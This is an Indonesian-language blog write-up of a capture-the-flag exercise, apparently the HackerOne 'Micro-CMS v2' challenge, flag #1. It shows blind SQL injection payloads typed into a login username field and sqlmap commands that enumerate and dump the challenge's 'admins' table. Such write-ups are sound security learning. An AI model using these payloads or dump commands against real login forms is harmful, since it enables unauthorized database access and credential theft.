Hackerone CTF Micro-CMS V2 (Flag#1) writeUp


halo, kali ini aku akan membagi ilmu mengenai CTF, disini aku juga baru belajar alias newbie 😂.
langsung saja ke poko' pembahasan. . .

RECON

Disini saya menggunakan CTF dari Hackerone CTF yaitu Micro-CMS V2. pada kasus CTF ini terdapat 3 flag dan yang saya temukan pertama kali adalah Blind SQLi.

Halaman Web CTF - Micro-CMS v2
hal yang pertama saya lakukan adalah membuat new page, ketika saya klik ternyata muncul halaman login,
setelah saya coba dengan menggunakan admin = admin, muncul error "Uknown user". kemudian saya coba untuk melakukan bypass pada halaman login tersebut.  dengan menambahkan tanda petik setelah kata admin pada kolom username. dan muncul error seperti ini 


disana muncul error yang menandakan bahwa halaman web tersebut rentan SQLi dan tentunya didapatkan satu tabel yaitu "admins" dari database yang ada pada web tersebut.

FLAG #1

setelah menemukan vulnerability tersebut, aku coba untuk melakukan bruteforce dengan menggunakan BurpSuite. 

' or LENGTH(database())=30# "
setelah mendapatkan LENGTH dari db tersebut, selanjutnya saya coba untuk bruteforce kembali dengan tujuan mencari nama dari db tersebut, 

' or database() LIKE '______'#
kemudian blok garis bawah tersebut dan klik add$ pada setiap garis bawah.
setelah aku coba bruteforce. didapatkan nama database tersebut yaitu level2.
selanjutnya aku coba dump isi dari database tersebut dengan Sqlmap.

sqlmap -u http://35.227.24.107/ce0b133f64/login --method POST --data "username=FUZZ&password=" -p username --dbs --dbms mysql --level 2 

sqlmap -u http://35.227.24.107/ce0b133f64/login --method POST --data "username=FUZZ&password=" -p username  -D level2 -T admins  --dbms mysql --level 2


sqlmap -u http://35.227.24.107/ce0b133f64/login --method POST --data "username=FUZZ&password=" -p username --dump -D level2 -T admins  --dbms mysql --level 2


oke, sekian dulu untuk flag#1, untuk flag ke 2 & 3 aku lanjut lagi next . . 
jika ada kekurangan dan kesalahan silahkan comment, karena saya juga masih belajar 😹😹
loading...

Posting Komentar

0 Komentar